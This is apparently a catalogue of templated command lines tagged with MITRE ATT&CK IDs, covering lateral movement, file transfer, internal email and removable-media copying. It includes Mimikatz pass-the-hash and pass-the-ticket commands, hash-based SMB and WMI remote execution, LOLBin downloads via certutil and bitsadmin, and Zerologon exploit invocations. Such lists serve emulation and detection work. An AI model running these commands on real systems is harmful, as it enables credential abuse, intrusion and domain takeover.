T1021 SharpRDP.exe computername=${ip_address} command="${commnad}" username=${domain}\${username} password=${password}
T1021 psexec \\${ip_address} -i -u ${username} -p ${password} ${command}
T1021 psexec \\${ip_address} -i ${command}
T1021 psexec \\${ip_address} -i -u ${username} -p ${password} ${command} -s
T1021 psexec \\${ip_address} -u ${username} -p ${password} script.txt
T1021 plink -ssh ${ip_address} -l ${username} -pw ${password}
T1021 plink ${username}@${ip_address}
T1021 ssh ${user}@${ip}
T1021 putty ${username}@${ip_address}
T1021 putty -ssh ${ip_address} -l ${username} -pw ${password}
T1021 putty -ssh ${username}@${ip_address} -pw ${password}
T1021 putty -ssh ${ip_address} -l ${username} -pw ${password} -m script.txt
T1021 putty -ssh ${username}@${ip_address} -pw ${password} -m script.txt
T1021 sftp ${username}@{ip_address}
T1021 termius username@hostname
T1021 xfreerdp /u:${username} /p:${password} /v:${ip_address}
T1021 xfreerdp /v:${ip_address}
T1021 mstsc /v:${ip_address} /f
T1021 vncviewer ${ip_address}
T1021 Enter-PSSession -ComputerName ${ip_address} -Credential ${password}
T1021 Enter-PSSession -ComputerName ${ip_address} -Port ${port} -Credential ${password}
T1021 Enter-PSSession -HostName ${username}@${ip_address}
T1021 wmic /node:${ip_address} /user:${username} /password:${password} process call create "cmd.exe /c ${command}"
T1570 xcopy ${source_file_path} \\${Destination_IP}\${Destination_file_path} /Y
T1570 xcopy ${source_file_path} \\${Destination_IP}\${Destination_file_path}
T1570 xcopy ${source_file_path} \\${Destination_IP}\${Destination_file_path} /s
T1570 Copy-Item ${source_file_path} -Destination "\\${Destination_IP}\C$\${Destination_file_path}" -Recurse -Credential ${password}
T1570 copy \\${Source_IP}\${source_file_path} \\${Destination_IP}\${Destination_file_path}
T1570 Start-BitsTransfer -Source ${source_file_path} -Destination ${Destination_file_path}
T1570 scp ${local_file} ${username}@${remote_host}:${remote_path}
T1570 scp ${username}@${remote_host}:${remote_file} ${local_path}
T1570 pscp ${local_path}${username}@${remote_host}:${remote_file}
T1570 certutil -urlcache -split -f ${remote_file} ${local_path}
T1570 start "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" ${remote_file}
T1570 MsoHtmEd.exe ${remote_file}
T1570 ProtocolHandler.exe ${remote_file}
T1570 bitsadmin.exe /transfer ${bits_job_name} /Priority HIGH ${remote_file} ${local_path}
T1570 (New-Object System.Net.WebClient).DownloadFile("${remote_file}", "${local_path}")
T1570 iwr -URI ${remote_file} -Outfile ${local_path}
T1570 Invoke-WebRequest -URI ${remote_file} -Outfile ${local_path}
T1570 powershell.exe iwr -URI ${remote_file} -Outfile ${local_path}
T1570 powershell.exe Invoke-WebRequest -URI ${remote_file} -Outfile ${local_path}
T1570 certreq.exe -Post -config ${remote_file} c:\windows\win.ini ${local_path}
T1570 CertReq -Post -config ${remote_destination} ${local_path}
T1570 curl ${remote_destination} -o $ ${local_path}
T1570 Start-BitsTransfer -Source ${source_file_path} -Destination ${remote_destination}
T1570 Invoke-RestMethod -Uri ${remote_file} -OutFile ${local_path}
T1534 echo ${email_content} | mail -s ${email_subject} ${username}@${domain}
T1534 mail -s ${email_subject} ${username}@${domain} < mail.txt
T1534 echo ${email_content} | mutt -s ${email_subject} ${username}@${domain}
T1534 echo ${email_content} | mutt -s ${email_subject} ${username}@${domain} -a attachement.txt
T1534 cat email.txt | mutt -s ${email_subject} ${username}@${domain}
T1534 echo ${email_content} | mpack -s ${email_subject} ${username}@${domain}
T1534 echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} -a attachement.txt
T1534 cat email.txt | mpack -s ${email_subject} ${username}@${domain}
T1534 sendmail ${username}@${domain} < mail.txt
T1534 echo ${email_content} | sendmail ${username}@${domain}
T1534 cat email.txt | sendmail ${username}@${domain}
T1534 ssmtp ${username}@${domain} < mail.txt
T1534 echo -e ${email_content} | ssmtp ${username}@${domain}
T1534 cat email.txt | ssmtp ${username}@${domain}
T1550 sekurlsa::pth /user:${username} /Domain:${domain} /ntlm:${ntlm} /run:"PsExec.exe \\${ip_address} ${process}"
T1550 sekurlsa::pth /user:${username} /Domain:${domain} /ntlm:${ntlm}
T1550 kerberos::ptt ticket.kirbi
T1550 Rubeus.exe ptt /ticket:ticket.kirbi
T1550 Invoke-WMIExec -Target ${ip_address} -Domain ${domain} -Username ${username} -Hash ${ntlm} -Command ${command} -verbose
T1550 Invoke-SMBExec -Target ${ip_address} -Domain ${domain} -Username ${username} -Hash ${ntlm} -Command ${command} -verbose
T1550 Invoke-SMBEnum -Target ${ip_address} -Domain ${domain} -Username ${username} -Hash ${ntlm} -Command ${command} -verbose
T1091 copy ${source_file_path} ${media_file_path}
T1091 cp -r ${source_file_path} ${media_file_path}
T1091 robocopy ${source_file_path} ${media_file_path} /e
T1091 xcopy ${source_file_path} ${media_file_path}
T1091 xcopy ${source_file_path} ${media_file_path} /s /e
T1091 robocopy ${source_file_path} ${media_file_path}  /mir
T1091 robocopy ${source_file_path} ${media_file_path} /e /xo
T1091 robocopy ${source_file_path} ${media_file_path} /e /copyall
T1091 robocopy ${source_file_path}  ${media_file_path} /e /copyall /mir
T1091 rsync -avz ${source_file_path} ${media_file_path}
T1091 Copy-Item ${source_file_path} -Destination ${media_file_path}
T1091 Copy-Item ${source_file_path} -Destination ${media_file_path} -Recurse
T1091 Copy-Item ${source_file_path} -Destination ${media_file_path} -Recurse -Container
T1091 scp ${source_file_path} ${username}@${ip_address}:${media_file_path}
T1091 pscp ${source_file_path} ${username}@${ip_address}:${media_file_path}
T1091 Start-BitsTransfer -Source ${source_file_path} -Destination ${media_file_path}
T1080 copy ${source_file_path} ${share_file_path}
T1080 cp -r ${source_file_path} ${share_file_path}
T1080 robocopy ${source_file_path} ${share_file_path} /e
T1080 xcopy ${source_file_path} ${share_file_path}
T1080 xcopy ${source_file_path} ${share_file_path} /s /e
T1080 robocopy ${source_file_path} ${share_file_path}  /mir
T1080 robocopy ${source_file_path} ${share_file_path} /e /xo
T1080 robocopy ${source_file_path} ${share_file_path} /e /copyall
T1080 robocopy ${source_file_path}  ${share_file_path} /e /copyall /mir
T1080 rsync -avz ${source_file_path} ${share_file_path}
T1080 Copy-Item ${source_file_path} -Destination ${share_file_path}
T1080 Copy-Item ${source_file_path} -Destination ${share_file_path} -Recurse
T1080 scp ${source_file_path} ${username}@${ip_address}:${share_file_path}
T1080 pscp ${source_file_path} ${username}@${ip_address}:${share_file_path}
T1080 Copy-Item ${source_file_path} -Destination ${share_file_path} -Recurse -Container
T1080 Start-BitsTransfer -Source ${source_file_path} -Destination ${share_file_path}
T1210 python ./cve-2020-1472-exploit.py -n ${dc_name} -t ${dc_ip}
T1210 lsadump::zerologon /target:${dc_name}.${domain} /account:${username} /exploit